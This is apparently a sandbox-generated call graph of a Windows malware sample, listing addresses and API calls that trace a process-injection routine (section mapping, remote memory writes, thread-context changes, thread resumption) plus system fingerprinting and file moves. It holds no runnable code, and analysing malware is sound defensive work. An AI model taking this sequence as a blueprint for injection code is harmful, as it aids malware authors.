49e8bf4 2 API calls 13521->13522 13523 49e6db2 13522->13523 13524 49e8bf4 2 API calls 13523->13524 13525 49e6dbc 13524->13525 13526 49e8bf4 2 API calls 13525->13526 13527 49e6dc6 13526->13527 13528 49e8bf4 2 API calls 13527->13528 13532 49e6dd0 13528->13532 13529 49e6e76 13533 49e8bf4 2 API calls 13529->13533 13530 49e6e6e 13536 49e8bf4 2 API calls 13530->13536 13531 49e6e3e 13531->13529 13531->13530 13535 49e8bf4 2 API calls 13531->13535 13532->13531 13540 49e8bf4 HeapFree memset 13532->13540 13541 49e6e28 13532->13541 13537 49e6e85 13533->13537 13534 49e8bf4 2 API calls 13538 49e6e36 13534->13538 13535->13531 13536->13529 13537->13476 13539 49e8bf4 2 API calls 13538->13539 13539->13531 13540->13532 13541->13534 13543 49e9ee7 13542->13543 13544 49e9f0c 13543->13544 13545 49e9f00 memset 13543->13545 13544->13504 13545->13544 13547 49e16ee 13546->13547 13548 49f3674 2 API calls 13547->13548 13549 49e170c 13547->13549 13548->13547 13549->13512 13551 49ea065 GetSystemTimeAsFileTime 13550->13551 13552 49e15a5 13551->13552 13553 49ea065 GetSystemTimeAsFileTime 13552->13553 13554 49e15ad 13553->13554 13555 49ea205 6 API calls 13554->13555 13557 49e15d2 13555->13557 13556 49e15da 13556->13494 13557->13556 13558 49ea065 GetSystemTimeAsFileTime 13557->13558 13559 49e161a 13557->13559 13558->13557 13560 49ea15b 2 API calls 13559->13560 13560->13556 13598 49eab05 13561->13598 13564 49e1774 13565 49e8bf4 2 API calls 13564->13565 13567 49e178a 13565->13567 13568 49e1080 2 API calls 13567->13568 13569 49e1794 13568->13569 13570 49eb1a4 7 API calls 13569->13570 13571 49e17af 13570->13571 13572 49e8b9c 2 API calls 13571->13572 13573 49e17bd 13572->13573 13574 49e1828 13573->13574 13575 49e1080 2 API calls 13573->13575 13576 49e1830 13574->13576 13605 49e8bde RtlAllocateHeap 13574->13605 13578 49e17cc 13575->13578 13576->13513 13579 49e8f2e 4 API calls 13578->13579 13580 49e17dc 13579->13580 13581 49e8b9c 2 API calls 13580->13581 13586 49e17e9 13581->13586 13582 49e8bf4 2 API calls 13583 49e19cb 13582->13583 13584 49e8bf4 2 API calls 13583->13584 13584->13576 13585 49e1805 13588 49e8bf4 2 API calls 13585->13588 13586->13585 13587 49e1663 3 API calls 13586->13587 13587->13585 13590 49e181e 13588->13590 13589 49ea96c 4 API calls 13597 49e191d 13589->13597 13591 49e92de 6 API calls 13590->13591 13591->13574 13592 49e19b8 13592->13582 13593 49e1843 13593->13589 13593->13592 13594 49f3674 2 API calls 13594->13597 13595 49e198e 13595->13592 13596 49e16e5 2 API calls 13595->13596 13596->13595 13597->13594 13597->13595 13599 49eab20 4 API calls 13598->13599 13600 49e1758 13599->13600 13600->13564 13601 49e1663 13600->13601 13603 49e1680 13601->13603 13602 49e8c72 3 API calls 13602->13603 13603->13602 13604 49e16d5 13603->13604 13604->13564 13605->13593 11228 49e64ef 11229 49e64fd 11228->11229 11234 49e6555 11228->11234 11257 49e8bc9 HeapCreate 11229->11257 11231 49e6502 11258 49e9591 11231->11258 11241 49e655a 11278 49e8baf 11241->11278 11242 49e6550 11243 49e8baf 2 API calls 11242->11243 11243->11234 11250 49e65b1 CreateThread 11250->11234 11358 49e6298 11250->11358 11251 49ef05c 8 API calls 11252 49e658c 11251->11252 11291 49e6370 memset 11252->11291 11257->11231 11310 49e8bde RtlAllocateHeap 11258->11310 11260 49e6507 11261 49f3cd5 11260->11261 11262 49f3d0a 11261->11262 11311 49e8c43 11262->11311 11264 49e6515 11265 49ef05c 11264->11265 11315 49e9dd8 11265->11315 11268 49ef07e GetModuleHandleA 11270 49ef08d 11268->11270 11269 49ef086 LoadLibraryA 11269->11270 11271 49ef09b 11270->11271 11318 49ef011 11270->11318 11323 49e8b9c 11271->11323 11275 49e9df2 11341 49e8ac6 11275->11341 11277 49e653c GetFileAttributesW 11277->11241 11277->11242 11279 49e8bbd 11278->11279 11280 49e655f 11278->11280 11281 49e8bf4 2 API calls 11279->11281 11282 49e109a 11280->11282 11281->11280 11283 49e8ac6 2 API calls 11282->11283 11284 49e10b5 11283->11284 11285 49e9cb5 11284->11285 11286 49e9cd1 11285->11286 11288 49e6573 11286->11288 11347 49e8bde RtlAllocateHeap 11286->11347 11288->11250 11288->11251 11289 49e9ce4 11289->11288 11290 49e8bf4 2 API calls 11289->11290 11290->11288 11348 49e1080 11291->11348 11293 49e639c 11294 49e63ec 11293->11294 11295 49e63ad 11293->11295 11296 49e1080 2 API calls 11294->11296 11297 49e1080 2 API calls 11295->11297 11298 49e63f6 11296->11298 11299 49e63b5 11297->11299 11303 49e8b9c 2 API calls 11298->11303 11351 49e9e12 11299->11351 11301 49e63cb 11302 49e8b9c 2 API calls 11301->11302 11304 49e63d6 11302->11304 11303->11304 11305 49e8bf4 11304->11305 11306 49e65a1 11305->11306 11307 49e8bfe 11305->11307 11306->11250 11307->11306 11308 49e8d6d memset 11307->11308 11309 49e8c2e HeapFree 11308->11309 11309->11306 11310->11260 11314 49e8bde RtlAllocateHeap 11311->11314 11313 49e8c54 11313->11264 11314->11313 11327 49e89ef 11315->11327 11334 49e8bde RtlAllocateHeap 11318->11334 11320 49ef052 11320->11271 11322 49ef023 11322->11320 11335 49eeebb 11322->11335 11324 49e8ba4 11323->11324 11326 49e652b 11323->11326 11325 49e8bf4 2 API calls 11324->11325 11325->11326 11326->11275 11328 49e8a12 lstrlenA 11327->11328 11330 49e8a78 11328->11330 11332 49e8a81 11328->11332 11333 49e8bde RtlAllocateHeap 11330->11333 11332->11268 11332->11269 11333->11332 11334->11322 11336 49eef2f 11335->11336 11337 49eeed4 11335->11337 11336->11322 11337->11336 11338 49eef87 LoadLibraryA 11337->11338 11338->11336 11339 49eef95 GetProcAddress 11338->11339 11339->11336 11340 49eefa1 11339->11340 11340->11336 11342 49e8ae4 lstrlenA 11341->11342 11346 49e8bde RtlAllocateHeap 11342->11346 11345 49e8b60 11345->11277 11345->11345 11346->11345 11347->11289 11349 49e89ef 2 API calls 11348->11349 11350 49e1096 11349->11350 11350->11293 11355 49e8d6d 11351->11355 11354 49e9e40 11354->11301 11356 49e8d76 memset 11355->11356 11357 49e8d87 _vsnprintf 11355->11357 11356->11357 11357->11354 11370 49e6412 11358->11370 11362 49e62a9 11364 49e62e3 11362->11364 11369 49e62b3 11362->11369 11433 49ed804 11362->11433 11365 49e631a 11364->11365 11366 49e6313 11364->11366 11365->11369 11471 49e35a1 11365->11471 11449 49e611b 11366->11449 11371 49ef05c 8 API calls 11370->11371 11372 49e6426 11371->11372 11373 49ef05c 8 API calls 11372->11373 11374 49e643f 11373->11374 11375 49ef05c 8 API calls 11374->11375 11376 49e6458 11375->11376 11377 49ef05c 8 API calls 11376->11377 11378 49e6471 11377->11378 11379 49ef05c 8 API calls 11378->11379 11380 49e648a 11379->11380 11381 49ef05c 8 API calls 11380->11381 11382 49e64a1 11381->11382 11383 49ef05c 8 API calls 11382->11383 11384 49e64b8 11383->11384 11385 49ef05c 8 API calls 11384->11385 11386 49e64cf 11385->11386 11387 49ef05c 8 API calls 11386->11387 11388 49e629d GetOEMCP 11387->11388 11389 49edf3d 11388->11389 11478 49e8bde RtlAllocateHeap 11389->11478 11391 49edf58 11392 49edf63 GetCurrentProcessId 11391->11392 11393 49ee2b8 11391->11393 11394 49edf7b 11392->11394 11393->11362 11479 49ec879 11394->11479 11396 49edfdf 11495 49ef3a3 11396->11495 11397 49edfce 11397->11396 11486 49ec8c9 11397->11486 11402 49ee014 11403 49ee05e GetLastError 11402->11403 11404 49ee064 GetSystemMetrics 11402->11404 11403->11404 11406 49ee08b 11404->11406 11504 49ec6ce 11406->11504 11411 49ee0c6 11521 49ec6e4 11411->11521 11416 49e8d6d memset 11417 49ee11d GetVersionExA 11416->11417 11540 49edd39 11417->11540 11421 49ee13b GetWindowsDirectoryW 11422 49e9df2 2 API calls 11421->11422 11423 49ee15e 11422->11423 11424 49e8baf 2 API calls 11423->11424 11425 49ee198 11424->11425 11427 49ee1d0 11425->11427 11563 49e9e51 11425->11563 11546 49f351a 11427->11546 11642 49ed6dc 11433->11642 11436 49ed950 11436->11364 11438 49ed945 11439 49e8bf4 2 API calls 11438->11439 11439->11436 11440 49ed933 11440->11438 11441 49e8bf4 2 API calls 11440->11441 11441->11440 11442 49ed841 11442->11438 11442->11440 11443 49e8d6d memset 11442->11443 11446 49ed8b4 GetLastError 11442->11446 11448 49ed8de FindCloseChangeNotification 11442->11448 11654 49ebc84 11442->11654 11659 49ed959 11442->11659 11443->11442 11672 49eda57 ResumeThread 11446->11672 11448->11442 11742 49ea608 11449->11742 11452 49e612a 11452->11369 11453 49e6142 11758 49e6247 11453->11758 11456 49e6147 11457 49e61a0 11456->11457 11458 49e6151 11456->11458 11792 49e600c 11457->11792 11460 49e61a5 11458->11460 11461 49e6156 11458->11461 11462 49e619e 11460->11462 11463 49e61c1 11460->11463 11805 49f0a67 11460->11805 11461->11463 11466 49eb557 7 API calls 11461->11466 11826 49e5ff2 11462->11826 11463->11369 11467 49e6176 11466->11467 11769 49e5edd 11467->11769 13042 49e8bde RtlAllocateHeap 11471->13042 11473 49e35a8 11474 49e35df 11473->11474 13043 49e8bde RtlAllocateHeap 11473->13043 11474->11369 11476 49e35b9 11476->11474 11477 49e96da 2 API calls 11476->11477 11477->11474 11478->11391 11480 49ec890 11479->11480 11481 49ec894 11480->11481 11567 49ec862 11480->11567 11481->11397 11484 49ec8b9 FindCloseChangeNotification 11485 49ec8a5 11484->11485 11485->11397 11580 49ec79e GetCurrentThread OpenThreadToken 11486->11580 11489 49ec97f 11489->11396 11490 49ec7f5 6 API calls 11494 49ec8fd FindCloseChangeNotification 11490->11494 11492 49ec975 11493 49e8bf4 2 API calls 11492->11493 11493->11489 11494->11489 11494->11492 11496 49ef3c2 11495->11496 11498 49ee009 11496->11498 11585 49e98bd 11496->11585 11499 49ef368 11498->11499 11500 49ef37f 11499->11500 11501 49ef39f 11500->11501 11502 49e98bd RtlAllocateHeap 11500->11502 11501->11402 11503 49ef38c 11502->11503 11503->11402 11590 49ec5ec 11504->11590 11506 49ec6e2 11507 49ec4c1 11506->11507 11508 49ec4dc 11507->11508 11509 49e9dd8 2 API calls 11508->11509 11510 49ec4e6 11509->11510 11605 49f3674 11510->11605 11512 49ec531 11513 49e8b9c 2 API calls 11512->11513 11514 49ec53d 11513->11514 11517 49e99df 11514->11517 11515 49ec4fb 11515->11512 11516 49f3674 2 API calls 11515->11516 11516->11515 11518 49e99eb MultiByteToWideChar 11517->11518 11519 49e99e6 11517->11519 11520 49e99ff 11518->11520 11519->11411 11520->11411 11522 49e9dd8 2 API calls 11521->11522 11523 49ec6fd 11522->11523 11524 49e9dd8 2 API calls 11523->11524 11526 49ec709 11524->11526 11525 49ec799 11534 49eca46 11525->11534 11526->11525 11527 49f3674 2 API calls 11526->11527 11528 49ec75a 11526->11528 11527->11526 11529 49f3674 2 API calls 11528->11529 11530 49ec785 11528->11530 11529->11528 11531 49e8b9c 2 API calls 11530->11531 11532 49ec791 11531->11532 11533 49e8b9c 2 API calls 11532->11533 11533->11525 11535 49eca5e 11534->11535 11536 49ec7f5 6 API calls 11535->11536 11538 49eca62 11535->11538 11537 49eca76 11536->11537 11537->11538 11539 49e8bf4 2 API calls 11537->11539 11538->11416 11539->11538 11541 49edd4e GetCurrentProcess IsWow64Process 11540->11541 11542 49edd5f 11540->11542 11541->11542 11543 49edd62 11542->11543 11544 49edd6c 11543->11544 11545 49edd71 GetSystemInfo 11543->11545 11544->11421 11545->11421 11547 49ee299 11546->11547 11548 49f3525 11546->11548 11550 49e96da 11547->11550 11548->11547 11549 49f3674 2 API calls 11548->11549 11549->11548 11610 49e9662 11550->11610 11564 49e8d6d memset 11563->11564 11565 49e9e65 _vsnwprintf 11564->11565 11566 49e9e82 11565->11566 11566->11427 11570 49ec7f5 GetTokenInformation 11567->11570 11571 49ec817 GetLastError 11570->11571 11578 49ec834 11570->11578 11572 49ec822 11571->11572 11571->11578 11579 49e8bde RtlAllocateHeap 11572->11579 11574 49ec82a 11575 49ec838 GetTokenInformation 11574->11575 11574->11578 11576 49ec84d 11575->11576 11575->11578 11577 49e8bf4 2 API calls 11576->11577 11577->11578 11578->11484 11578->11485 11579->11574 11581 49ec7eb 11580->11581 11582 49ec7bf GetLastError 11580->11582 11581->11489 11581->11490 11582->11581 11583 49ec7cc OpenProcessToken 11582->11583 11583->11581 11586 49e98c6 11585->11586 11588 49e98d8 11585->11588 11589 49e8bde RtlAllocateHeap 11586->11589 11588->11498 11589->11588 11591 49e8d6d memset 11590->11591 11592 49ec60e lstrcpynW 11591->11592 11594 49e9df2 2 API calls 11592->11594 11595 49ec643 GetVolumeInformationW 11594->11595 11596 49e8baf 2 API calls 11595->11596 11597 49ec678 11596->11597 11598 49e9e51 2 API calls 11597->11598 11599 49ec699 lstrcatW 11598->11599 11603 49ea456 11599->11603 11602 49ec6bf 11602->11506 11604 49ea45e CharUpperBuffW 11603->11604 11604->11602 11606 49f3684 11605->11606 11607 49f36b7 lstrlenW 11606->11607 11608 49f36d4 _ftol2_sse 11607->11608 11608->11515 11611 49e9672 11610->11611 11611->11611 11643 49ed6fb 11642->11643 11673 49e8bde RtlAllocateHeap 11643->11673 11645 49ed7f3 11645->11436 11650 49eb557 11645->11650 11646 49e9df2 2 API calls 11648 49ed796 11646->11648 11647 49e8baf 2 API calls 11647->11648 11648->11645 11648->11646 11648->11647 11649 49e98bd RtlAllocateHeap 11648->11649 11649->11648 11651 49eb570 11650->11651 11674 49eb4a6 11651->11674 11655 49e8d6d memset 11654->11655 11656 49ebc9a 11655->11656 11657 49e8d6d memset 11656->11657 11658 49ebca7 CreateProcessW 11657->11658 11658->11442 11683 49ed218 11659->11683 11662 49eda49 11730 49ed38b 11662->11730 11667 49e8d6d memset 11668 49ed99f GetThreadContext 11667->11668 11668->11662 11669 49ed9c9 NtProtectVirtualMemory 11668->11669 11669->11662 11670 49eda0b NtWriteVirtualMemory 11669->11670 11670->11662 11671 49eda28 NtProtectVirtualMemory 11670->11671 11671->11662 11672->11442 11673->11648 11675 49f351a 2 API calls 11674->11675 11676 49eb4be 11675->11676 11677 49e9dd8 2 API calls 11676->11677 11678 49eb4e8 11677->11678 11679 49e9e12 2 API calls 11678->11679 11680 49eb546 11679->11680 11681 49e8b9c 2 API calls 11680->11681 11682 49eb551 11681->11682 11682->11442 11684 49ed246 11683->11684 11685 49ed234 11683->11685 11687 49e9df2 2 API calls 11684->11687 11685->11684 11686 49ed373 11685->11686 11686->11662 11709 49ed447 11686->11709 11688 49ed253 11687->11688 11689 49e9e51 2 API calls 11688->11689 11690 49ed28c 11689->11690 11691 49e9df2 2 API calls 11690->11691 11692 49ed2ab 11691->11692 11735 49e9a5a 11692->11735 11695 49e8baf 2 API calls 11696 49ed2d3 11695->11696 11697 49e9a5a 2 API calls 11696->11697 11698 49ed2f6 LoadLibraryW 11697->11698 11700 49ed32f 11698->11700 11701 49ed321 11698->11701 11703 49e8bf4 2 API calls 11700->11703 11702 49ef011 3 API calls 11701->11702 11702->11700 11704 49ed344 11703->11704 11705 49e8d6d memset 11704->11705 11706 49ed356 11705->11706 11706->11686 11707 49e8bf4 2 API calls 11706->11707 11708 49ed371 11707->11708 11708->11686 11710 49ed47a 11709->11710 11711 49ed49b NtCreateSection 11710->11711 11716 49ed68e 11710->11716 11712 49ed4c4 RegisterClassExA 11711->11712 11711->11716 11713 49ed518 CreateWindowExA 11712->11713 11714 49ed554 NtMapViewOfSection 11712->11714 11713->11714 11715 49ed542 DestroyWindow UnregisterClassA 11713->11715 11714->11716 11721 49ed587 NtMapViewOfSection 11714->11721 11715->11714 11717 49ed6c3 11716->11717 11722 49ed6bf NtUnmapViewOfSection 11716->11722 11718 49ed6cc NtClose 11717->11718 11719 49ed6d7 11717->11719 11718->11719 11719->11662 11719->11667 11721->11716 11723 49ed5ab 11721->11723 11722->11717 11724 49e8c43 RtlAllocateHeap 11723->11724 11725 49ed5bb 11724->11725 11725->11716 11726 49ed5ca VirtualAllocEx WriteProcessMemory 11725->11726 11727 49e8bf4 2 API calls 11726->11727 11728 49ed611 11727->11728 11729 49ed674 lstrlenW 11728->11729 11729->11716 11731 49ed394 FreeLibrary 11730->11731 11732 49ed3a2 11730->11732 11731->11732 11733 49ed3c3 11732->11733 11734 49e8bf4 2 API calls 11732->11734 11733->11442 11734->11733 11736 49e9a6c 11735->11736 11741 49e8bde RtlAllocateHeap 11736->11741 11738 49e9a8b 11739 49e9aa8 11738->11739 11740 49e9a97 lstrcatW 11738->11740 11739->11695 11740->11738 11741->11738 11830 49ea633 11742->11830 11745 49f0c7b 11894 49e8bde RtlAllocateHeap 11745->11894 11747 49f0c82 11748 49f0c8c 11747->11748 11895 49eb3c7 11747->11895 11748->11453 11751 49f0cd0 11751->11453 11756 49f0a67 14 API calls 11757 49f0ccd 11756->11757 11757->11453 11932 49e5ce2 11758->11932 11761 49e6250 11761->11456 11762 49e5edd 10 API calls 11763 49e6267 11762->11763 11764 49e6270 11763->11764 11935 49ea9d6 11763->11935 11764->11456 11767 49e627d lstrcmpiW 11767->11456 11768 49e6295 11768->11456 11770 49eb557 7 API calls 11769->11770 11771 49e5ef6 11770->11771 11772 49e5f03 11771->11772 11773 49e9a07 2 API calls 11771->11773 11774 49e5f26 11773->11774 11962 49e5ed4 11774->11962 11776 49e5f36 11777 49e5f5a 11776->11777 11780 49e5ed4 2 API calls 11776->11780 11778 49e8bf4 2 API calls 11777->11778 11779 49e5f66 11778->11779 11781 49e60bf 11779->11781 11780->11777 11782 49ea9d6 4 API calls 11781->11782 11783 49e60c9 11782->11783 11784 49e60d7 lstrcmpiW 11783->11784 11785 49e60d2 11783->11785 11786 49e60ed 11784->11786 11787 49e6109 11784->11787 11785->11462 11967 49eaace 11786->11967 11788 49e8bf4 2 API calls 11787->11788 11788->11785 12016 49e8bde RtlAllocateHeap 11792->12016 11794 49e601e 11795 49e6062 11794->11795 11796 49e6031 GetDriveTypeW 11794->11796 12017 49e2be4 11795->12017 11796->11795 11798 49e607e 11799 49e609c 11798->11799 12032 49e53c7 11798->12032 12102 49eafd6 11799->12102 11803 49eafd6 2 API calls 11804 49e60b8 11803->11804 11804->11460 11806 49e109a 2 API calls 11805->11806 11807 49f0a76 11806->11807 12677 49e66c7 memset 11807->12677 11810 49e8baf 2 API calls 11811 49f0a9c 11810->11811 11814 49f0b15 11811->11814 12689 49ea96c 11811->12689 11814->11462 11816 49f0ac7 11816->11814 11817 49e109a 2 API calls 11816->11817 11818 49f0ad9 11817->11818 11819 49e9e51 2 API calls 11818->11819 11820 49f0ae8 11819->11820 11821 49eb5fb 2 API calls 11820->11821 11822 49f0afb 11821->11822 11823 49f0b09 11822->11823 12693 49eadd4 11822->12693 11825 49e8bf4 2 API calls 11823->11825 11825->11814 11827 49e6004 11826->11827 12706 49e5c22 11827->12706 11869 49e8bde RtlAllocateHeap 11830->11869 11832 49ea65d 11833 49e6126 11832->11833 11870 49ec43a 11832->11870 11833->11452 11833->11453 11833->11745 11836 49e9dd8 2 API calls 11837 49ea69d 11836->11837 11838 49ea7db 11837->11838 11842 49ea6c9 11837->11842 11839 49ea82c 11838->11839 11840 49ea7ed 11838->11840 11841 49e9a07 2 API calls 11839->11841 11843 49e9a07 2 API calls 11840->11843 11864 49ea7d7 11840->11864 11841->11864 11842->11864 11880 49e9a07 11842->11880 11843->11864 11844 49e8b9c 2 API calls 11847 49ea84c 11844->11847 11846 49e8bf4 2 API calls 11848 49ea8e2 11846->11848 11847->11846 11860 49ea8a7 11847->11860 11851 49e8d6d memset 11848->11851 11849 49ea791 11856 49e9a07 2 API calls 11849->11856 11851->11860 11852 49e9df2 2 API calls 11853 49ea72f 11852->11853 11854 49e9a5a 2 API calls 11853->11854 11857 49ea741 11854->11857 11855 49e8bf4 2 API calls 11855->11833 11858 49ea7b8 11856->11858 11859 49e8baf 2 API calls 11857->11859 11863 49e8bf4 2 API calls 11858->11863 11861 49ea74f 11859->11861 11860->11855 11860->11860 11886 49e9930 11861->11886 11863->11864 11864->11844 11865 49e8bf4 2 API calls 11867 49ea786 11865->11867 11868 49e8bf4 2 API calls 11867->11868 11868->11849 11869->11832 11871 49ec453 11870->11871 11872 49f3674 2 API calls 11871->11872 11873 49ec463 11872->11873 11874 49e9dd8 2 API calls 11873->11874 11875 49ec472 11874->11875 11876 49ec4ae 11875->11876 11878 49f3674 2 API calls 11875->11878 11877 49e8b9c 2 API calls 11876->11877 11879 49ea67e 11877->11879 11878->11875 11879->11836 11881 49e9a19 11880->11881 11892 49e8bde RtlAllocateHeap 11881->11892 11883 49e9a36 11884 49e9a42 lstrcatA 11883->11884 11885 49e9a53 11883->11885 11884->11883 11885->11847 11885->11849 11885->11852 11887 49e9939 11886->11887 11888 49e9966 11886->11888 11893 49e8bde RtlAllocateHeap 11887->11893 11888->11865 11890 49e994b 11890->11888 11891 49e9953 MultiByteToWideChar 11890->11891 11891->11888 11892->11883 11893->11890 11894->11747 11896 49eb3df 11895->11896 11897 49eb3d8 11895->11897 11896->11897 11898 49eb409 11896->11898 11926 49e8bde RtlAllocateHeap 11896->11926 11897->11751 11901 49f0b23 11897->11901 11898->11897 11900 49e8bf4 2 API calls 11898->11900 11900->11897 11927 49e8bde RtlAllocateHeap 11901->11927 11903 49f0b36 11904 49f0c28 11903->11904 11905 49e109a 2 API calls 11903->11905 11910 49f0c73 11903->11910 11908 49e8bf4 2 API calls 11904->11908 11906 49f0b6f 11905->11906 11907 49e9df2 2 API calls 11906->11907 11909 49f0b93 11907->11909 11908->11910 11911 49e9a5a 2 API calls 11909->11911 11922 49efba1 11910->11922 11912 49f0bb1 11911->11912 11913 49eb3c7 3 API calls 11912->11913 11914 49f0bbe 11913->11914 11915 49e8baf 2 API calls 11914->11915 11916 49f0bca 11915->11916 11917 49e8baf 2 API calls 11916->11917 11920 49f0bd3 11917->11920 11918 49e8bf4 2 API calls 11919 49f0c1d 11918->11919 11921 49e8bf4 2 API calls 11919->11921 11920->11918 11921->11904 11923 49efbc5 11922->11923 11928 49f0320 11923->11928 11926->11898 11927->11903 11930 49f0339 11928->11930 11929 49f035a lstrlenW 11931 49efbd7 11929->11931 11930->11929 11930->11930 11931->11756 11933 49eb557 7 API calls 11932->11933 11934 49e5cff 11933->11934 11934->11761 11934->11762 11936 49ea9db 11935->11936 11939 49eab20 11936->11939 11940 49eab42 11939->11940 11953 49ea5d3 11940->11953 11942 49e6279 11942->11767 11942->11768 11943 49eab4c 11943->11942 11956 49ecd27 11943->11956 11945 49eac19 11946 49e8bf4 2 API calls 11945->11946 11946->11942 11947 49eab80 11947->11945 11948 49f0320 lstrlenW 11947->11948 11949 49eabd1 11948->11949 11951 49e8c43 RtlAllocateHeap 11949->11951 11952 49eabf4 11949->11952 11950 49e8bf4 2 API calls 11950->11945 11951->11952 11952->11950 11960 49e8bde RtlAllocateHeap 11953->11960 11955 49ea5df 11955->11943 11957 49ecd4d 11956->11957 11959 49ecd51 11957->11959 11961 49e8bde RtlAllocateHeap 11957->11961 11959->11947 11960->11955 11961->11959 11963 49eb0e4 11962->11963 11964 49eb10a GetLastError 11963->11964 11965 49eb115 GetLastError 11963->11965 11966 49eb0ee 11963->11966 11964->11966 11965->11966 11966->11776 11983 49eaadc 11967->11983 11970 49ebfdb SetFileAttributesW 11971 49e8d6d memset 11970->11971 11972 49ec008 11971->11972 11973 49ec029 11972->11973 11974 49f3674 2 API calls 11972->11974 11973->11787 11975 49ec045 11974->11975 11976 49e9e51 2 API calls 11975->11976 11977 49ec056 11976->11977 11978 49e9a5a 2 API calls 11977->11978 11979 49ec067 11978->11979 11979->11973 12004 49ebf08 11979->12004 11982 49e8bf4 2 API calls 11982->11973 11984 49eaaec 11983->11984 11987 49eac4b 11984->11987 11988 49e60fe 11987->11988 11989 49eac68 11987->11989 11988->11787 11988->11970 11989->11988 11990 49f3674 2 API calls 11989->11990 11991 49eacac 11990->11991 12003 49e8bde RtlAllocateHeap 11991->12003 11993 49eacc0 11993->11988 11994 49f351a 2 API calls 11993->11994 11995 49ead02 11994->11995 11996 49f0320 lstrlenW 11995->11996 11997 49ead43 11996->11997 11998 49ea5d3 RtlAllocateHeap 11997->11998 12001 49ead4f 11998->12001 11999 49eadb9 12000 49e8bf4 2 API calls 11999->12000 12000->11988 12001->11999 12002 49e8bf4 2 API calls 12001->12002 12002->11999 12003->11993 12005 49ebf2b 12004->12005 12006 49ebfa2 12005->12006 12007 49ebf33 memset 12005->12007 12006->11982 12008 49e9df2 2 API calls 12007->12008 12009 49ebf4f 12008->12009 12010 49f3674 2 API calls 12009->12010 12011 49ebf6b 12010->12011 12012 49e9e51 2 API calls 12011->12012 12013 49ebf81 12012->12013 12014 49e8baf 2 API calls 12013->12014 12015 49ebf8a MoveFileW 12014->12015 12015->12006 12016->11794 12018 49e1080 2 API calls 12017->12018 12019 49e2bfd 12018->12019 12110 49eb1a4 12019->12110 12022 49e8b9c 2 API calls 12023 49e2c20 12022->12023 12024 49e2c53 12023->12024 12025 49e1080 2 API calls 12023->12025 12024->11798 12026 49e2c2e 12025->12026 12120 49eaf9c 12026->12120 12029 49e8b9c 2 API calls 12030 49e2c47 12029->12030 12031 49e8bf4 2 API calls 12030->12031 12031->12024 12228 49ef14a 12032->12228 12037 49ef05c 8 API calls 12038 49e5401 12037->12038 12039 49e9df2 2 API calls 12038->12039 12040 49e5412 12039->12040 12041 49e9a5a 2 API calls 12040->12041 12042 49e542a 12041->12042 12043 49e8baf 2 API calls 12042->12043 12044 49e543d 12043->12044 12047 49e5453 12044->12047 12248 49eafb9 12044->12248 12046 49e8bf4 2 API calls 12048 49e5464 12046->12048 12047->12046 12254 49e50b3 memset 12048->12254 12050 49e5481 12051 49e8d6d memset 12050->12051 12052 49e5776 12050->12052 12053 49e54bd 12051->12053 12054 49e9df2 2 API calls 12052->12054 12314 49ef326 12053->12314 12055 49e5782 12054->12055 12057 49e9a5a 2 API calls 12055->12057 12063 49e579a 12057->12063 12075 49e55ff 12075->11799 12103 49eafe5 12102->12103 12109 49e60b0 12102->12109 12104 49eb00a 12103->12104 12105 49e8bf4 2 API calls 12103->12105 12106 49e8bf4 2 API calls 12104->12106 12105->12103 12107 49eb015 12106->12107 12108 49e8bf4 2 API calls 12107->12108 12108->12109 12109->11803 12111 49e9930 2 API calls 12110->12111 12112 49eb1c4 12111->12112 12113 49f3674 2 API calls 12112->12113 12115 49eb211 12112->12115 12114 49eb1e3 FindResourceW 12113->12114 12114->12112 12114->12115 12116 49e8bf4 2 API calls 12115->12116 12117 49eb21c 12116->12117 12118 49e8c43 RtlAllocateHeap 12117->12118 12119 49e2c10 12117->12119 12118->12119 12119->12022 12125 49e8f2e 12120->12125 12123 49e2c3c 12123->12029 12126 49e8f3d 12125->12126 12128 49e8f79 12125->12128 12143 49e8bde RtlAllocateHeap 12126->12143 12128->12123 12133 49eaee1 12128->12133 12129 49e8f47 12129->12128 12144 49e8e33 12129->12144 12132 49e8bf4 2 API calls 12132->12128 12187 49e90ae 12133->12187 12137 49eaf95 12137->12123 12138 49eaf8d 12197 49e92de 12138->12197 12140 49eaefb 12140->12137 12140->12138 12141 49e8c72 3 API calls 12140->12141 12193 49e9880 12140->12193 12141->12140 12143->12129 12158 49e8bde RtlAllocateHeap 12144->12158 12146 49e8e48 12149 49e8e70 12146->12149 12157 49e8e55 12146->12157 12159 49e9384 12146->12159 12147 49e8ef4 12150 49e8bf4 2 API calls 12147->12150 12147->12157 12149->12147 12151 49e8ebe 12149->12151 12152 49e9384 lstrlenW 12149->12152 12150->12157 12151->12147 12151->12157 12163 49efc3a 12151->12163 12152->12151 12155 49e8f0e 12156 49e8bf4 2 API calls 12155->12156 12156->12157 12157->12128 12157->12132 12158->12146 12160 49e93a4 12159->12160 12161 49f0320 lstrlenW 12160->12161 12162 49e93c8 12161->12162 12162->12149 12178 49e8bde RtlAllocateHeap 12163->12178 12165 49efdcd 12167 49e8bf4 2 API calls 12165->12167 12166 49efc5e 12166->12165 12179 49e8bde RtlAllocateHeap 12166->12179 12169 49efdf3 12167->12169 12171 49e8bf4 2 API calls 12169->12171 12170 49efc7e 12170->12165 12180 49e8bde RtlAllocateHeap 12170->12180 12172 49efe01 12171->12172 12174 49e8eed 12172->12174 12175 49e8bf4 2 API calls 12172->12175 12174->12147 12174->12155 12175->12174 12176 49efc92 12176->12165 12181 49e8c72 12176->12181 12178->12166 12179->12170 12180->12176 12186 49e8bde RtlAllocateHeap 12181->12186 12183 49e8caf 12183->12176 12184 49e8c87 12184->12183 12185 49e8bf4 2 API calls 12184->12185 12185->12183 12186->12184 12189 49e90d1 12187->12189 12188 49e8bde RtlAllocateHeap 12188->12189 12189->12188 12190 49e9205 12189->12190 12191 49e8bf4 2 API calls 12189->12191 12192 49e8bde RtlAllocateHeap 12190->12192 12191->12189 12192->12140 12194 49e988b 12193->12194 12196 49e98a1 12193->12196 12209 49e8bde RtlAllocateHeap 12194->12209 12196->12140 12199 49e92ed 12197->12199 12208 49e9375 12197->12208 12198 49e9327 12200 49e9337 12198->12200 12210 49e9405 12198->12210 12199->12198 12202 49e8bf4 2 API calls 12199->12202 12199->12208 12201 49e9352 12200->12201 12204 49e8bf4 2 API calls 12200->12204 12205 49e8bf4 2 API calls 12201->12205 12207 49e9368 12201->12207 12202->12199 12204->12201 12205->12207 12206 49e8bf4 2 API calls 12206->12208 12207->12206 12208->12137 12209->12196 12222 49e8bde RtlAllocateHeap 12210->12222 12212 49e9448 12212->12200 12213 49e943e 12213->12212 12214 49e9471 12213->12214 12216 49e94ef 12213->12216 12223 49e8dbb 